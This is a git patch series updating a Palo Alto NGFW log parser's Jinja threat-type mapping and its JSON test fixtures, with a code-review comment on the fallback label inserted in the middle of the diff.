@@ -32,6 +32,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json index cd41f06d0..9cb10263a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json @@ -33,6 +33,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json index 2130588d1..2aa5ce29e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json index db55cc61a..48dc1f1bd 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json @@ -47,7 +47,12 @@ "serial_number": "016201000000" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url", + "VirtualLocation": "vsys1", "threat": { "id": "9999" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json index 196fc9c0c..e45d01607 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json @@ -57,7 +57,12 @@ "serial_number": "012345678910" }, "paloalto": { + "DGHierarchyLevel1": "320", + "DGHierarchyLevel2": "90", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys1", "threat": { "id": "95187", "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json index bc3ccb698..d2e4e4775 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json @@ -30,6 +30,11 @@ "serial_number": "026701002348" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "general", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json index cc477a27e..c0f834538 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json @@ -59,7 +59,13 @@ "serial_number": "007954000351998" }, "paloalto": { - "Threat_ContentType": "end" + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "end", + "URLCategory": "any", + "VirtualLocation": "vsys1" }, "related": { "ip": [ 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json index 72bc384fb..cfa92faf3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json @@ -59,7 +59,13 @@ "serial_number": "007954000351998" }, "paloalto": { - "Threat_ContentType": "end" + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "end", + "URLCategory": "any", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json index 4657c725b..2f58900ab 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json index b22a31f88..9a1d42f34 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json index 9f659a601..ea53d3353 100644 
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "auth" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json index d2477e4f1..dee27d0e1 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json @@ -30,7 +30,14 @@ "serial_number": "01545100000000" }, "paloalto": { - "Threat_ContentType": "login" + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "0", + "Threat_ContentType": "login", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json index a3738eaf2..23d0aaaf8 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json @@ -32,6 +32,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json index 42b530f45..c3b8bcffc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json 
@@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "fb" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json index 4e097a01e..b6430085e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json @@ -59,7 +59,13 @@ "serial_number": "016401004874" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url", + "VirtualLocation": "vsys", + "VirtualSystemName": "VSYS", "threat": { "id": "9999" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json index 207cd20b3..afc856776 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json @@ -72,6 +72,24 @@ }, "paloalto": { "DirectionOfAttack": "server to client", + "PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "X-Phone", + "PanOSDestinationDeviceHost": "pan-622", + "PanOSDestinationDeviceMac": "620797415366", + "PanOSDestinationDeviceModel": "MI", + "PanOSDestinationDeviceOSFamily": "A1", + "PanOSDestinationDeviceOSVersion": "Android v9.1", + "PanOSDestinationDeviceProfile": "x-profile", + "PanOSDestinationDeviceVendor": "Xiaomi", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceDeviceHost": "pan-505", + "PanOSSourceDeviceModel": "Note 4G", + "PanOSSourceDeviceProfile": "x-profile", + "PanOSSourceDeviceVendor": "Lenovo", + "PanOSSourceLocation": "LY", + "PanOSThreatCategory": "unknown", + "PanOSThreatID": "27379(27379)", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" }, 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json index cff329e0f..571880744 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json @@ -51,7 +51,12 @@ "serial_number": "001701000000" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys", "threat": { "id": "34805", "name": "PDF Exploit Evasion Found" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json index b74fdb564..4fd068d08 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json @@ -72,6 +72,12 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSessionStartTime": "Jul 31 2022 12:43:06", + "PanOSSourceLocation": "10.0.0.0-10.255.255.255", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "LF-5698-NR" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json index 1469faf57..a892a2a7b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json @@ -72,6 +72,12 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSessionStartTime": "Aug 02 2022 06:41:44", + "PanOSSourceLocation": "10.0.0.0-10.255.255.255", + "URLCategory": "low-risk", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "GP cloud service" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json index 9bf8bd0de..58c77fa30 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json 
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json @@ -78,6 +78,29 @@ "version": "2.0" }, "paloalto": { + "PanOSContainerName": "pan-dp-77754f4", + "PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "N-Phone", + "PanOSDestinationDeviceHost": "pan-355", + "PanOSDestinationDeviceMac": "530589561221", + "PanOSDestinationDeviceModel": "Nexus", + "PanOSDestinationDeviceOSFamily": "H1511", + "PanOSDestinationDeviceOSVersion": "Android v7", + "PanOSDestinationDeviceProfile": "n-profile", + "PanOSDestinationDeviceVendor": "Google", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSGPHostID": "xxxxxxxxxxxxxx", + "PanOSHASessionOwner": "session_owner-4", + "PanOSSessionStartTime": "Feb 27 2021 20:15:48", + "PanOSSourceDeviceHost": "pan-301", + "PanOSSourceDeviceModel": "Nexus", + "PanOSSourceDeviceProfile": "n-profile", + "PanOSSourceDeviceVendor": "Google", + "PanOSSourceDynamicAddressGroup": "aqua_dag", + "PanOSSourceLocation": "east-coast", + "PanOSX-Forwarded-ForIP": "1.1.1.1", + "URLCategory": "custom-category", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json index 1621cfeed..3445ddc4f 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json @@ -49,7 +49,8 @@ "serial_number": "026701002040" }, "paloalto": { - "Threat_ContentType": "end" + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json index 324587ad2..3238eb5e4 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json 
@@ -49,7 +49,8 @@ "serial_number": "1801017000" }, "paloalto": { - "Threat_ContentType": "deny" + "Threat_ContentType": "deny", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json index f3a6b58d6..41d495725 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json @@ -77,6 +77,25 @@ }, "paloalto": { "DirectionOfAttack": "server to client", + "PanOSContainerName": "pan-dp-77754f4", + "PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "L-Phone", + "PanOSDestinationDeviceHost": "pan-506", + "PanOSDestinationDeviceMac": "150083646537", + "PanOSDestinationDeviceModel": "Note XT", + "PanOSDestinationDeviceOSFamily": "K8", + "PanOSDestinationDeviceOSVersion": "Android v8", + "PanOSDestinationDeviceProfile": "l-profile", + "PanOSDestinationDeviceVendor": "Lenovo", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceDeviceHost": "pan-505", + "PanOSSourceDeviceModel": "Note 4G", + "PanOSSourceDeviceProfile": "l-profile", + "PanOSSourceDeviceVendor": "Lenovo", + "PanOSSourceDynamicAddressGroup": "blue_dag", + "PanOSSourceLocation": "west-coast", + "URLCategory": "sports", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json index ea8e442b5..c90ab6ed6 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json @@ -53,6 +53,10 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" + }, "related": { "hosts": [ "PA-5220" 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index 8c7d37227..edd76521b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -60,8 +60,13 @@ "serial_number": "111111111111" }, "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "738", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", "Threat_ContentType": "wildfire", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxx" }, From f1eeaae60b543557d034df7cba8d641ebaf2d392 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 31 Oct 2024 12:21:33 +0200 Subject: [PATCH 188/317] Avoid disabled jinja functions --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 14 +++++++------- .../paloalto-ngfw/tests/test_ldap_brute_force.json | 3 ++- .../paloalto-ngfw/tests/test_threat.json | 3 ++- .../paloalto-ngfw/tests/test_threat_02.json | 3 ++- .../paloalto-ngfw/tests/threat-url-xff.json | 3 ++- .../paloalto-ngfw/tests/threat_csv.json | 3 ++- 6 files changed, 17 insertions(+), 12 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 835674257..bf144527c 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -735,21 +735,21 @@ stages:
 - set:
 paloalto.threat.type: >
 {%- set id = parsed_threat.message.threat_code | int -%}
- {%- if id in range(8000, 8100) -%}
+ {%- if 8000 <= id < 8100 -%}
 {%- set name = 'scan detection' -%}
- {%- elif id in range(8500, 8600) -%}
+ {%- elif 8500 <= id < 8600 -%}
 {%- set name = 'flood detection' -%}
 {%- elif id == 9999 -%}
 {%- set name = 'URL filtering log' -%}
- {%- elif id in range(10000, 20000) -%}
+ {%- elif 10000 <= id < 20000 -%}
 {%- set name = 'spyware phone home detection' -%}
- {%- elif id in range(20000, 30000) -%}
+ {%- elif 20000 <= id < 30000 -%}
 {%- set name = 'spyware download detection' -%}
- {%- elif id in range(30000, 45000) -%}
+ {%- elif 30000 <= id < 45000 -%}
 {%- set name = 'vulnerability exploit detection' -%}
- {%- elif id in range(52000, 53000) -%}
+ {%- elif 52000 <= id < 53000 -%}
 {%- set name = 'filetype detection' -%}
- {%- elif id in range(60000 , 70000) -%}
+ {%- elif 60000 <= id < 70000 -%}
 {%- set name = 'data filtering detection' -%}
 {%- endif -%}
 {{name | default('custom threat')}}
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index aab8fbd6b..f569f8246 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
@@ -59,7 +59,8 @@
 "VirtualLocation": "vsys1",
 "threat": {
 "id": "40005",
- "name": "LDAP: User Login Brute Force Attempt"
+ "name": "LDAP: User Login Brute Force Attempt",
+ "type": "vulnerability exploit detection"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 48dc1f1bd..51579bdcb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
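Review bot: The fallback `{{name | default('custom threat')}}` at the end of the hunk labels every threat_code outside the hard-coded ranges as a custom signature, and the fixture updated in this same commit shows the effect: id 95187, named `Palo Alto Networks GlobalProtect OS Command Injection Vulnerability` and logged with `Threat_ContentType: vulnerability`, now gets `type: custom threat`, which a detection rule keyed on paloalto.threat.type would misclassify. Because `| int` also coerces a missing or non-numeric threat_code to 0, such events reach the same fallback silently instead of leaving the field unset. I would fall back to the log's own subtype rather than a fixed string, e.g. replace the last line with `{{name | default(parsed_threat.message.threat_content_type | default('custom threat'))}}` (the exact field carrying the subtype is outside this hunk, so confirm its name), or at least document the limit with `# NOTE: vendor IDs above 45000 (newer vulnerability signatures) fall through to 'custom threat'`. The actions list enclosing this `- set:` begins before the hunk.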
@@ -54,7 +54,8 @@ "Threat_ContentType": "url", "VirtualLocation": "vsys1", "threat": { - "id": "9999" + "id": "9999", + "type": "URL filtering log" } }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json index e45d01607..eadb40265 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json @@ -65,7 +65,8 @@ "VirtualLocation": "vsys1", "threat": { "id": "95187", - "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability" + "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability", + "type": "custom threat" } }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json index b6430085e..57cb1121b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json @@ -67,7 +67,8 @@ "VirtualLocation": "vsys", "VirtualSystemName": "VSYS", "threat": { - "id": "9999" + "id": "9999", + "type": "URL filtering log" } }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json index 571880744..20a78b306 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json @@ -59,7 +59,8 @@ "VirtualLocation": "vsys", "threat": { "id": "34805", - "name": "PDF Exploit Evasion Found" + "name": "PDF Exploit Evasion Found", + "type": "vulnerability exploit detection" } }, "related": { From ad9efd9aa7daa3d0ebb494aab1da4a608f156bda Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Wed, 30 Oct 2024 14:45:27 +0200 Subject: [PATCH 189/317] Rebuild tests for PaloAlto NGFW --- .../paloalto-ngfw/tests/User_id_1_csv.json | 9 +------- .../paloalto-ngfw/tests/User_id_2_csv.json | 9 +------- .../paloalto-ngfw/tests/auth_cef.json | 7 ------ .../paloalto-ngfw/tests/decryption_cef.json | 3 --- .../paloalto-ngfw/tests/file_cef.json | 4 ---- .../paloalto-ngfw/tests/fix_bug_with_int.json | 3 +-- .../tests/fix_bug_without_int.json | 3 +-- .../tests/globalprotect_cef.json | 1 - .../tests/globalprotect_csv.json | 2 -- .../tests/globalprotect_csv_2.json | 2 -- .../paloalto-ngfw/tests/hip_match_cef.json | 3 --- .../paloalto-ngfw/tests/icmp_allow_csv.json | 3 +-- .../paloalto-ngfw/tests/iptag_cef.json | 4 ---- .../tests/network_threat_alert_1.json | 8 +------ .../tests/network_threat_alert_2.json | 9 +------- .../paloalto-ngfw/tests/sctp_cef.json | 4 ---- .../paloalto-ngfw/tests/system_csv.json | 5 ---- .../paloalto-ngfw/tests/tcp_allow_csv.json | 3 +-- .../tests/test_cloud_election_json.json | 4 ---- .../tests/test_dhcp_renew_json.json | 4 ---- .../tests/test_dns_proxy_json.json | 4 ---- .../tests/test_file_alert_json.json | 8 +------ .../tests/test_globalprotect.json | 2 -- .../tests/test_installed_package_json.json | 4 ---- .../tests/test_ldap_brute_force.json | 8 +------ .../tests/test_new_file_type.json | 8 +------ .../tests/test_new_globalprotect.json | 5 ---- .../tests/test_new_threat_type.json | 5 ---- .../tests/test_new_url_type.json | 8 +------ .../tests/test_ntp_sync_json.json | 4 ---- .../tests/test_port_up_json.json | 4 ---- .../tests/test_registration_succeed_json.json | 4 ---- .../paloalto-ngfw/tests/test_system.json | 5 ---- .../tests/test_system_event_10_json.json | 4 ---- .../tests/test_system_event_11_json.json | 4 ---- .../tests/test_system_event_12_json.json | 4 ---- .../tests/test_system_event_1_json.json | 4 ---- .../tests/test_system_event_2_json.json | 4 ---- .../tests/test_system_event_3_json.json | 4 ---- 
.../tests/test_system_event_4_json.json | 4 ---- .../tests/test_system_event_5_json.json | 4 ---- .../tests/test_system_event_6_json.json | 4 ---- .../tests/test_system_event_7_json.json | 4 ---- .../tests/test_system_event_8_json.json | 4 ---- .../tests/test_system_event_9_json.json | 4 ---- .../paloalto-ngfw/tests/test_threat.json | 8 +------ .../paloalto-ngfw/tests/test_threat_02.json | 8 +------ .../tests/test_timestamp_palo.json | 5 ---- .../tests/test_traffic_event_1_json.json | 8 +------ .../tests/test_traffic_event_2_json.json | 8 +------ .../tests/test_update_content_json.json | 4 ---- .../tests/test_upgrade_package_json.json | 4 ---- .../tests/test_user_authentication_json.json | 4 ---- .../paloalto-ngfw/tests/test_userid.json | 9 +------- .../tests/test_web_authentication_json.json | 4 ---- .../tests/test_wildfire_failure_json.json | 4 ---- .../paloalto-ngfw/tests/threat-url-xff.json | 9 +------- .../paloalto-ngfw/tests/threat_cef.json | 18 --------------- .../paloalto-ngfw/tests/threat_csv.json | 8 +------ .../paloalto-ngfw/tests/traffic1_csv.json | 6 ----- .../paloalto-ngfw/tests/traffic2_csv.json | 6 ----- .../paloalto-ngfw/tests/traffic_cef.json | 23 ------------------- .../tests/traffic_with_resotimestamp.json | 3 +-- .../paloalto-ngfw/tests/udp_deny_csv.json | 3 +-- .../paloalto-ngfw/tests/url_cef.json | 19 --------------- .../paloalto-ngfw/tests/userid_cef.json | 4 ---- .../paloalto-ngfw/tests/wildfire1_json.json | 5 ---- 67 files changed, 21 insertions(+), 356 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json index 08c69d61f..dba765bd4 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json 
@@ -30,14 +30,7 @@ "serial_number": "016401002222" }, "paloalto": { - "DGHierarchyLevel1": "12", - "DGHierarchyLevel2": "0", - "DGHierarchyLevel3": "0", - "DGHierarchyLevel4": "0", - "EventID": "0", - "Threat_ContentType": "login", - "VirtualLocation": "vsys", - "VirtualSystemID": "1" + "Threat_ContentType": "login" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json index 539963216..63c79e671 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json @@ -30,14 +30,7 @@ "serial_number": "01640103000" }, "paloalto": { - "DGHierarchyLevel1": "12", - "DGHierarchyLevel2": "0", - "DGHierarchyLevel3": "0", - "DGHierarchyLevel4": "0", - "EventID": "0", - "Threat_ContentType": "login", - "VirtualLocation": "vsys", - "VirtualSystemID": "1" + "Threat_ContentType": "login" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json index ff12d8db6..1b4a52135 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json @@ -57,13 +57,6 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, - "paloalto": { - "PanOSSourceDeviceHost": "src_host_list-0", - "PanOSSourceDeviceModel": "src_model_list-1", - "PanOSSourceDeviceProfile": "src_profile_list-1", - "PanOSSourceDeviceVendor": "src_vendor_list-1", - "VirtualLocation": "vsys1" - }, "related": { "hosts": [ "xxxxx" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json index 1a4fba4b4..e213912c2 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json 
